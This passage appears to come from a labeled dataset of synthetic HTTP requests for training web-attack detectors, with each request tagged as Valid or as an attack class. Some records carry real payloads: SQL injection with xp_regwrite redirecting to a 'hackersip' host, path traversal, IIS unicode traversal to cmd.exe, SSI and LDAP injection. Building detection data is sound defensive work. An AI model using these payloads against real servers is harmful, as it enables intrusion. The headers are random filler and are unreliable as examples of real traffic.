Content-MD5: RWxzaWRlQjRuaDNpb29lag==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 220.151.119.16
Connection: close
Accept: */*
Accept-Charset: x-mac-greek, iso-8859-8, utf-7
Accept-Encoding: gzip
Accept-Language: gtqifw-eomy;q=0.2
Cache-Control: max-age=2963
Client-ip: 75.168.219.135
Cookie: ectibsbnthc57eu=hNmacqet0nyEote;iblcnpafnc3n6r=riHoO
Cookie2: $Version="00"
Date: Mon, 18 Sep 06 08:02:37 CET
ETag: "IqZwGpXzggspWJiUdZ"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Sun, 23 May 04 02:06:26 UTC
If-Match: "GWpG9ythl1B74eVF"
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: *
Max-Forwards: 779
MIME-Version: 5.3
Pragma: Noawao='cbwyiia'
Proxy-Authorization: NTLM MWh3dWdhbzRnbFRudnVqZmpiRWxsbmgzZHMwd2IyZWZsZWVuaEpkb25jcWdFTnV0
Authorization: NTLM ZHR6aW5uYWViZW5hc0Nhc210NHJ4ZWxlcnJpb3Jub2dkcnV0dGky
Range: 0516-7855,069180-,334-
Referer: http://www.afthLa6r.cz/nnivt9od/Poot/nnhO3ehk/D6so/uUhqodE.wmn
TE: gzip
Trailer: TE
User-Agent: Mozilla/9.8 (compatible; shHe; Solaris; qfUicen; nicis)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: dqhx/9.3 www.3aosh.html, 9.7 www.afuRoia.png
Transfer-Encoding: deflate
Upgrade: 7dan1/4.1, egy/8.2, adh/9.9, duh9t/0.3
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qhtlis7efee=wshttp]ih]rAdtm&yOealuy=ymfetc&U@bJ-UG=988)(&(objectClass=cTb)(|(sn =  no)(cn=mgie  J*))&ta8rz=p8drnaslteocyrInao

End - Id: 37543
Start - Id: 41067
class: SqlInjection
GET /bMci-.DbDCOe@YvaUGaK/eesbwri.asmx?sjSi=nrh%40dfpqU_&AGis3=rkf&5TchildO6rRhogroup by=%7C0t7iD4&aeantiuu=%2Bfg%26e%3AhyhavingshutdownttlnStq%26%7Er&a-87@=eRHhcw&0ytffnn5onn=e+wt1+s%26iur&Lqbn6xatHsrY9=exec++++xp_regwrite++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27eYd8mdj%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&e1e=tyinn&mwcALX=2&lst9istc6u3C=eC+%26&4oNierd=%7ECo&aiwihhafx3=416&trehFD5etTlwfc=m&W0xwX=54348698&nnheLeirSkykgf=%3Am+ehe1lnkl8T HTTP/1.0
Host: www.tecivl2eb0.st:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 225.139.215.255
Cookie: txhettrjhvng6o9=429390299;enb=hc7p>1rel2ooit;inhis3e=hacj s[mmfsystemap  tt);4pzal4oiEatewt=satbu3on9;mailA3logBpTVhtpassOal= rs%;A5RSrm5Pl.=ieaeaseaectiltesd
Cookie2: $Version="049"
Date: Sun, 24 Aug 08 03:50:40 CET
ETag: W/"u4k2U1SQ_x00WBC1Jp"
Expect: ttrhbztf
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Wed, 20 Apr 05 01:08:12 CET
If-Unmodified-Since: Fri, 10 Apr 09 15:41:47 GMT
If-Match: *
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 1811
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest algorithm=MD5
Range: -4
Referer: /e3np/nrstF/dcorkte/epsth4/nsromw0r.pdf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.0 (X11; U; SunOS sun4u 6.5; ae-TE; rv:0.6.0) Gecko/55877125
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: FTP/1.4 www.HscrftE.html:780, ytJma/1.0 www.Xzyei.jpg
Transfer-Encoding: compress
Upgrade: uohtr/6.5, oeo/0.4
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41067
Start - Id: 44833
class: PathTransversal
GET /sIuT0O8rmUmm9G/ueN.u6evalq/eeh/c_8u@J1./sBnR/stwog6rbq/oOwMH3/6pyH@HkI/o2r2Inz7le8/rme/LqSzj.gif?n0NhsPsnIoh=4732&nhernow=iefehnDos9eoc3dl&ehGeani=08&h8TeeetiellhiOU=7186&olb9eaagjtoa=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500 HTTP/1.1
Host: 59.65.142.247
Connection: close
Accept: */*
Accept-Charset: windows-1257, x-mac-japanese
Accept-Encoding: deflate, deflate;q=0.5
Accept-Language: e9ezi-4sjdaD0t
Cache-Control: no-cache
Client-ip: 203.89.41.237
Cookie: iSiEytfu=49285;spTdyao=iun;cEna=ToniaSsq5elayi1a;hOaVlD9@luAX=jsaphtsar;8aa=ibxla80aadmincmailn;e3sna=oEUuc
Cookie2: $Version="4"
Date: Tue, 19 Aug 08 23:47:24 GMT
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "pKruFK87qFe3B6AmOom"
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 7713
MIME-Version: 3.1
Pragma: eysnbgE='sEdodrmu'
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: Digest opaque="hpOo"
Range: 49-580233,702708-4982,-8
Referer: /S2aodN/hevgaBoa/birs.css
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 8.2; tU-to; rv:4.8.6) Gecko/63326029
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 035x248
Via: 5.5 125.78.197.161
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44833
Start - Id: 8408
class: Valid
GET /sY/tSVSJ-DkFOBVvPg8QW/tuealOr_RSkV/e6vfyLj/z-d1/uolzPO/6mY.css? HTTP/1.0
Host: 164.163.252.173
Connection: oegpn
Accept: audio/*, video/*
Accept-Charset: iso-2022-kr;q=0.4
Accept-Encoding: 
Accept-Language: neiwrd-w, wOo-f9intiE;q=0.1, noNar3o-x;q=0.8, sdne-rphfA;q=0.7, e-c1H5fs;q=0.6
Cache-Control: Denp=sree
Client-ip: 120.161.56.52
Cookie: netnehtot=397;GSJi5.MCqMsystem=o&rcpandh;ausFnhrefge=erkxterm slt;deiutaBeeofrg=tteliodapSue
Cookie2: $Version="5"
Date: Wed, 18 Aug 04 11:36:29 GMT
ETag: "FKiG-NE8LQYXYmKnw"
Expect: meswe=yem4tw
From: vrT4@rhtowie.net
If-Modified-Since: Mon, 05 Sep 05 09:56:30 CET
If-Unmodified-Since: Thu, 03 Sep 09 10:12:13 GMT
If-Match: "XLxC5VkdXnFzXp@KM"
If-None-Match: "Rwvrh9Z-jQd15vuDjpPO"
If-Range: Sat, 10 Apr 04 06:10:48 UTC
Max-Forwards: 766
MIME-Version: 8.4
Pragma: neEsNe='irieu'
Proxy-Authorization: Basic cnJ0RURhWDpvdWV2bw==
Authorization: g8TE vcOiv=c7ie5q
Range: 994131-66069
Referer: http://www.s9zoiht.uk/deite.tar
TE: trailers,trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Windows; U; Win 9x 2.8; be-23; rv:7.2.0) Gecko/20986836
UA-CPU: MIPS
UA-Disp: 755,5837,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 928x374
Via: 9.4 111.207.105.120
Transfer-Encoding: identity
Upgrade: dvu6s/4.4
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8408
Start - Id: 6442
class: Valid
POST /e4h8okseuptconmnrEs/ebjmv@FifszXWoH/raivfIcsnolehDrYiAe/cAz./rsksenuart/d5..jpeg? HTTP/1.1
Content-Length: 33
Content-Language: asnf,e
Content-Encoding: deflate
Content-Location: http://mfEclnv.it/nzeyhlu/mnia/anaR/nuee/ithtiD.zip
Content-MD5: cDM1QWZjZTU4NmF0ZXVlZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Dec 06 15:57:15 CET
Last-Modified: Sat, 18 Aug 07 24:42:06 CET
Host: www.eaeonrt.net
Connection: atiaorsO
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 174.238.79.189
Cookie: Rns8aOctwv9=slevalieOaacereCho0positionqdp;v8P6etbezEua=e76etrorp;lshheettec=7Xuld2;drcbog=deseh;wtXrQvbscriptNK=oesig o;ajwisiotgrjaeu=770s
Cookie2: $Version="1"
Date: Fri, 31 Mar 06 01:27:08 CET
ETag: W/"HR3D1P2zKfs_AZlwNa84"
Expect: 100-continue
From: 3n6as@eicEn.st
If-Modified-Since: Thu, 21 Feb 08 04:11:38 UTC
If-Unmodified-Since: Wed, 15 Oct 08 15:13:13 UTC
If-Match: "Xsqz8Ydr6fnUd@Npcb0"
If-None-Match: "pOb@P3O-hY9tew4m"
If-Range: Mon, 30 Mar 09 23:59:52 CET
Max-Forwards: 2083
MIME-Version: 9.9
Pragma: ittl='treuub'
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Digest realm
Range: 20995-3,994884-5,-38008
Referer: /ieeteo.jpeg
TE: deflate
Trailer: Accept
User-Agent: Mozilla/2.2 (Windows; U; Win98 6.9; 0t-ix; rv:5.0.0) Gecko/73521785
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8174x6805
Via: 0.1 109.17.53.134:63493
Transfer-Encoding: identity
Upgrade: aasyat/1.2, sml/6.2, u6l7/7.3, oabN1/3.1
Warning: 732 www.f0zh.png "f2rdso" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

ro=acrrh&ercaAgN6ssn=2o0Wn5QvAzAI

End - Id: 6442
Start - Id: 24669
class: Valid
GET /eLwNDlixoEyia/nSoeOPWhQKr/n0yltch/Fcfd9d/fHrahRAstmssu/eintj/cHI@sEd0T/BtZ_cfst0/yQ5HesM/etuumientnAihee9o/@b0XVopenfXoC/lfmZJO.php3?HtmpOaecSI=noct6+or%261v2&oydbetcpeo=%25includeCnersoopentiat%28g&nmib=norieRio5%3D0&aNdsrvh=yF2oVyYP&ehneta=e3N&ekrvcttsemTdl=tzhem HTTP/1.1
Host: www.htsL.st
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate;q=0.3
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 148.233.252.203
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="662"
Date: Fri, 04 Apr 08 16:36:17 UTC
ETag: W/"CQa1TueLN00oxXh"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Wed, 05 Jan 05 01:18:56 GMT
If-Unmodified-Since: Sat, 04 Sep 04 24:19:49 CET
If-Match: "irvrAA6B0zswydz6ucJN"
If-None-Match: *
If-Range: Sun, 25 Jan 04 02:56:37 CET
Max-Forwards: 6951
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: Basic bm1KNWU6ZWg5bWg=
Range: 7216-
Referer: /s8aei9t/zmsageO/sde5vss/eirc.js
TE: gzip;q=0.7,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/5.8 (compatible; L1pstu8ta; Linux i586; aeas)
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 089x5784
Via: 8.4 162.105.199.155
Transfer-Encoding: Ncqi
Upgrade: Eiia/0.3, 5tg/5.8
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 183.59.161.0
X-Serial-Number: 791354389748242566
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24669
Start - Id: 36470
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 37.142.14.167
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.3
Accept-Encoding: compress;q=0.8, deflate
Accept-Language: rp-metnp;q=0.1
Cache-Control: no-transform
Client-ip: 171.165.21.220
Cookie: vya=s-;raheemotsrd=36;cr=04096358;1Soj1tmpdA3P8=el;Azsroati=sp7i;qi=yoemc
Cookie2: $Version="4"
Date: Mon, 09 Jul 07 15:24:20 UTC
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Mon, 04 Jul 05 22:45:41 GMT
If-Unmodified-Since: Fri, 16 Apr 10 18:55:43 GMT
If-Match: "8OnkzvC1RzRx8rNmi"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM d3NlZGVTZWJ0bG1oNzNuZGNjb2VpZDBhc2E2ZXJmMWI4b2NkZGFt
Range: 57-,410056-,436232-1281
Referer: /n8rth/twpee/loqtt/deNe/nlYvso.tiff
TE: trailers,gzip
Trailer: Accept
User-Agent: o57jQps http://www.ngeoxpRo.be
UA-CPU: Sparc
UA-Disp: 8174,3331,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: Ehk/5.5 www.esetm92c.png, 5.3 www.is5a.jpg, 0.5 www.shol.htm
Transfer-Encoding: essd
Upgrade: fet/9.1, iro/2.9
Warning: 011 www.qtp2.jpeg "qrH18z" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36470
Start - Id: 40958
class: SSI
PUT /5JBbcq2c9r3nlogY/wKsasjyieeiAst/Oaaseldsttdqms.bin? HTTP/1.0
Content-Length: 118
Content-Language: mnTtacn
Content-Encoding: deflate
Content-Location: /lmAn/IRfqrjks/ieli/hdmatM/diruqghw.wav
Content-MD5: b1RlSW9hUnAzc2NtZHdlMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jun 06 18:27:06 UTC
Last-Modified: Fri, 13 Mar 09 09:02:24 CET
Host: 109.65.207.117:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-japanese
Accept-Encoding: *
Accept-Language: <!--    #odbc connect="snda,ue,e9rtz"   statement="select  *    from    wxVCh"-->
Cache-Control: max-age=04
Cookie: wrieiomi=yQh;ftufe0V=rJp;utrUtelngo=o~];ots=hkaROD35P;UrY9ty=597580553;mboiME=8si1di8ii
Cookie2: $Version="263"
Date: Sun, 17 Jun 07 16:48:06 GMT
ETag: "1xJIV.Vbaw80waGd6"
If-Modified-Since: Mon, 05 Mar 07 15:30:25 GMT
If-None-Match: *
Max-Forwards: 1332
Authorization: oAta5 andltten=ehassyi
Referer: /eesz/Lomukv/8ta3m7o.gif
Trailer: Accept-Encoding
User-Agent: lwuuthhpXc
Warning: 267 62.138.82.72 "ee4m" "Thu, 15 Sep 05 24:21:36 UTC"
X-Forwarded-For: 102.101.60.89

31nEARUjxttmp=5828095726&thatdidsctdb=|ao2 wheren&p8r=$bitudelete ilogch&etee4ciiew=uu&o3Nwhs=14&gQincludeDJ_=65rm

End - Id: 40958
Start - Id: 38981
class: LdapInjection
GET /s5xhorbuwce/mjInm/tZp/r5neEaZtgu/3Blog/TTbbodysjXEinsertid.aspx?zn=533&enasiW5sM1=498&Wevxggsystemm60a=25&yaxpSnts6e9=22733979&-p-SsAscript=%29%28++++%7C++%28eltg%3Dd8*%29&6OopenW1window.openqwindow.open@=zNImnGvM0d HTTP/1.0
Host: 59.143.167.68
Connection: close
Accept: audio/*, image/gif, text/html;q=0.0
Accept-Charset: windows-1250, iso-8859-6;q=0.8, x-mac-icelandic, hz-gb-2312;q=0.4
Accept-Encoding: 
Accept-Language: thoet-7f0o;q=0.4, hloj-siuaeees;q=0.4, g-l4kE, rTuMoni-gdtinG;q=0.0, i-Tohyan;q=0.1
Cache-Control: max-age=20826
Client-ip: 39.110.44.223
Cookie: bj=71904683;htditendfartF=28
Cookie2: $Version="51"
Date: Fri, 15 Sep 06 19:22:44 CET
ETag: W/"aTH7ojAKF7GuLTnx"
Expect: 100-continue
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Mon, 22 May 06 02:47:52 CET
If-Unmodified-Since: Mon, 10 Apr 06 21:22:54 GMT
If-Match: "-bh6PVfsKGNMKV-"
If-None-Match: "IXcidcWwp_F18ou8yanP"
If-Range: Fri, 11 Feb 05 18:57:49 UTC
Max-Forwards: 949
MIME-Version: 8.0
Pragma: r=datNtrb
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: hsarsh iemroH=lnEh69
Range: -026476,-042,-27632
Referer: http://uGRrU.st/lIAmcodl/ZrpaTtoD.jpeg
TE: trailers,gzip;q=0.7
Trailer: Date
User-Agent: iocgavtcd (vDLn7i.; efQgtKG; fYs@46j; dJecOB)
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: 9.7 141.89.250.12
Transfer-Encoding: ouat; nwMsn=ctyo
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38981
Start - Id: 29830
class: Valid
GET /eeeceig/seeA9ade/o3eZfdL23hX._GVt/X7-8nXWWKpasswd21Gmocha/ihoAoeael/6R19YH_/jdF3P.9S/tCRRrwp_hkn1xe54u/d7h.cgi? HTTP/1.1
Host: www.gfdoh.ch:80
Connection: aslw
Accept: image/*;q=0.3
Accept-Charset: cp-936, x-mac-icelandic, cp-950, windows-1255;q=0.9, shift_jis;q=0.9
Accept-Encoding: identity
Accept-Language: *;q=0.0
Cache-Control: max-stale=3383
Client-ip: 64.126.244.88
Cookie: me3nwroqeiftbL2=S6ni5ode4ahodwHe;RHdocumentecholetcBydivC7J=adminairwhcpr?ajgs
Cookie2: $Version="7"
Date: Sun, 07 Mar 10 03:24:13 GMT
ETag: W/"F18o.XlNRAEhwIOPq-"
Expect: yiie7bb
From: rbldtdG@o7aniAtsO.ch
If-Modified-Since: Sun, 29 May 05 10:53:41 UTC
If-Unmodified-Since: Tue, 10 Apr 07 15:14:46 GMT
If-Match: *
If-None-Match: *
If-Range: "wm1MMgtZ9BbV@Bq63"
Max-Forwards: 5
MIME-Version: 7.9
Pragma: 0mnn='lfjln2i'
Proxy-Authorization: Digest opaque="iebwoe"
Authorization: Basic cmFUZ2VlOm9icGlmcA==
Range: 9669-56204,57635-,19451-
Referer: http://www.oonenza.be/enip/S4hed.php
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 2.4; on-np; rv:1.5.2) Gecko/35727861
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 238x9907
Via: HTTP/6.9 www.siem4.gif, tlsor/9.9 129.37.172.166:3726
Transfer-Encoding: gzip
Upgrade: eao/6.7, qpa/6.7
Warning: 757 171.183.186.152:6 "lkOups" 
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 211553371251
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29830
Start - Id: 928
class: Valid
GET /PsLhe6honnCmtwnsSd9/tHaoEchtvai4t9wrlpsh/fLB4HT/dfZKh4Sgj1PKlxl/ts7T/2K/0J3KUAca53chLtWBdZQe/gbs/olE.gif? HTTP/1.0
Host: www.asSxtr.cz
Connection: 7Rm9rhn
Accept: audio/*;q=0.6, image/*
Accept-Charset: windows-1252;q=0.8, windows-1254, macintosh;q=0.5, x-mac-japanese;q=0.2, windows-1251;q=0.2
Accept-Encoding: gzip;q=0.6, gzip
Accept-Language: *
Cache-Control: max-stale=1
Client-ip: 36.42.207.254
Cookie: Z86n9p-X=omhili>3 ei;J7XCjVU4=eVGChP
Cookie2: $Version="9"
Date: Sun, 09 Jan 05 21:00:27 GMT
ETag: "jr06Kr9AbFL4OWD"
Expect: ot7din=9aHhn
From: shr8m@eagitmhb.de
If-Modified-Since: Wed, 12 Dec 07 20:16:29 GMT
If-Unmodified-Since: Sun, 17 Jun 07 16:03:29 GMT
If-Match: "1xhVbR372I2b8SyNB3iN"
If-None-Match: "l1MekAP1tMVNfM9d"
If-Range: Thu, 28 May 09 22:56:49 CET
Max-Forwards: 9551
MIME-Version: 3.0
Pragma: weysiHej=rc9
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: NTLM aDhlNG5lTm9vNThkdDB0dEllbDNpN3MzcjV0dGxlb3JvdGhUbDVldHJvY3da
Range: 37-165,99813-448132
Referer: http://Hldtd.org/iwtieir/uiOfHea/aeeMshs/zoey8ma/p9knnso.php4
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.4 (X11; U; Unix 7.9; zs-bE; rv:4.2.5) Gecko/07144541
UA-CPU: StrongARM
UA-Disp: 705,7453,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7361x8160
Via: HTTP/7.6 159.166.146.91:2
Transfer-Encoding: compress
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 09721285233182
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 928
Start - Id: 25700
class: Valid
GET /hols.erH38/lo73HyeL_kM6f1tW0p4/saeti3/otStlidauprteh.jsp? HTTP/1.1
Host: www.AdnrrA7odg.ch
Connection: close
Accept: video/*, image/gif, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale=1
Client-ip: 153.23.207.46
Cookie: xe=81102;wuo2irsm9pscL=saeg];xuosre6ur=r9dsdssAa;yet=rnurnlsiarpat
Cookie2: $Version="13"
Date: Wed, 20 Jan 10 01:00:17 GMT
ETag: W/"ojCA4A.8hsaY1DNUbv"
Expect: aomansr
From: oyBm@Iqerhbe.st
If-Modified-Since: Mon, 16 Jul 07 07:41:21 GMT
If-Unmodified-Since: Thu, 11 Dec 08 22:43:58 CET
If-Match: *
If-None-Match: "oIryuasWrpVqw5C444eF"
If-Range: Mon, 05 Jun 06 16:57:45 GMT
Max-Forwards: 3
MIME-Version: 2.6
Pragma: loleei='0rgr'
Proxy-Authorization: NTLM YWV0SWFlclFSYnJldWUycm95Y3BkSWV0c3J3ZWM5aWZFTGFlZXBqcmh5Y2kwb0g=
Authorization: Basic YW9zYW9lbjp1Nnc0ZW5qbw==
Range: 474-85459,37271-
Referer: /uNoeItmh.bin
TE: trailers
Trailer: Authorization
User-Agent: e-GrGSGhga http://www.Dsouseia.it
UA-CPU: MIPS
UA-Disp: 564,067,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8973x257
Via: 8.3 www.nwa6hr.png
Transfer-Encoding: identity
Upgrade: ojeiet/9.9, woq/6.0, ttYs/5.7, urTi2/9.1
Warning: 082 www.eboallI.jpeg:4162 "ejedRtlU" "Tue, 03 Jan 06 15:18:09 GMT"
X-Forwarded-For: 223.76.39.236
X-Serial-Number: 30259160107930
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25700
Start - Id: 20570
class: Valid
GET /_GEKA4UH0d6zq/nyo/0fro3Nel3Jit2ho/k6fprocessing-instructioncE/mct/otRsuptwhE8csa/stoAiv7b9iFwd/TJnPjrKC07/oW9/Ktc2GUAVc-processing-instruction2JG.jpeg?icaee6b=tten&F5Yetcnh1=79674307&tlpitu=o+enasaey%5Dets%24q0style&ncuvlk8uautoexec=dit1eiausraana&dbee=18092026&kxpg=32558696&pesabilsdeuaOpi=RuiK4rsnxm&5zR_M3pF=1cdt%3Ei&ssaaRepral3=66636578&NChind3rafraero=nct%7Cu+nnph-shutdownnaa6a&sn1ownzees6eea=3 HTTP/1.1
Host: 119.195.69.180:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-cyrillic, koi8-r, iso-8859-3, koi8, x-mac-greek;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 108.141.166.90
Cookie: j2li3watmrevy=6807497;Er7ermsak=cti
Cookie2: $Version="407"
Date: Thu, 25 May 06 07:02:50 UTC
ETag: W/"WkWpj8JTaJ@IQSW8p"
Expect: ruigm0oi=yotntt;wytfaT=Fef6e
From: po0uCr@azOlx3ayBy.org
If-Modified-Since: Wed, 07 Jun 06 05:59:40 UTC
If-Unmodified-Since: Sun, 17 May 09 08:26:27 CET
If-Match: "WVfD5XnkSYiBdMepF42"
If-None-Match: "y9XN-SYCDDxashzs"
If-Range: Fri, 26 May 06 07:19:48 CET
Max-Forwards: 01
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic bjlrdW9lOmF0ZWc=
Authorization: Basic MXN1ZWh0OnJ4cmVl
Range: 852875-5353
Referer: /qds9hld/oraeetd/aat3tm.html
TE: deflate;q=0.2
Trailer: Host
User-Agent: Mozilla/2.6 (compatible; MSIE 9.7; Win 9x; onpbldo)
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7369x544
Via: HTTP/6.6 www.eepns.png, FTP/6.3 231.219.78.100, afen/5.8 www.0bnSa1h.js
Transfer-Encoding: compress
Upgrade: oenMr/2.7, dlt8/0.7, qsRuu/2.7, keAsp/4.8
Warning: 257 13.243.249.249 "3a9dtgni" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20570
Start - Id: 7823
class: Valid
POST /gpYao1WN/ideNfog/gOtledEe6tehaaaFdWi/tefrceTnumso7ssktda/i0QtUWSi.cgi? HTTP/1.1
Content-Length: 269
Content-Language: 71ioir04,pvapsh,oah
Content-Encoding: identity
Content-Location: /igatdd4.txt
Content-MD5: bkNlN09lNmVzdHdFMmNjZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Jan 07 12:33:13 GMT
Last-Modified: Sun, 02 Jan 05 23:51:43 UTC
Host: 244.3.101.83
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: ot0r-n, Neeoik-AAiiia, 08pmte-inc0n;q=0.6, ah-ar4;q=0.1
Cache-Control: min-fresh=2965
Client-ip: 100.210.11.231
Cookie: F9yw5nz=dVKQ7i.U;2xZprn=beEwpSdsa21 let;o2tt74k=13077987
Cookie2: $Version="675"
Date: Mon, 02 Feb 04 03:47:42 CET
ETag: "68kh4lmaleAcjYJu.WF"
Expect: 100-continue
From: k7euba@tlndi8g.org
If-Modified-Since: Tue, 21 Sep 04 03:27:50 CET
If-Unmodified-Since: Mon, 13 Sep 04 08:26:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 6.1
Pragma: Etcsra=gr
Proxy-Authorization: NTLM T3BpNHNobmVlYnNEdzhyaVRpOWp1cnVvdHRlVWp0QXduMGkyZVM=
Authorization: NTLM YWVtZW91ZXplYmdoeWE4aXRBdGJobWJubmVBaGRpdGFhMG9hMW5Ec29SZXJpT2w=
Range: 7699-
